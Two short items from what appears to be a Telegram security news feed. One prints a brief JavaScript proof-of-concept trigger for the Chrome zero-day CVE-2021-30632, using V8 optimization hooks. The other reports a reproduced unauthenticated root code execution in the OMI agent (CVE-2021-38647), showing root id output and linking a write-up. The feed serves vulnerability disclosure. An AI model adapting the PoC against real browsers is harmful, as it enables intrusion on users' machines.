September 15, 2021 at 12:11PM

■■□□□ CVE-2021-30632: Chrome Zero-day PoC var a; function foo() { a = new Uint32Array(100); } %PrepareFunctionForOptimization(foo); foo(); foo(); a[“xxx”] =1; delete a[“xxx”]; %OptimizeFunctionOnNextCall(foo); foo(); https://t.me/cKure/9333

September 15, 2021 at 09:46AM

■■■□□ Reproduction of CVE-2021-38647 (unauthed root RCE in the OMI agent) using the details in the technical blog post. uid=0(root) gid=0(root) groups=0(root) https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution https://t.me/cKure/9325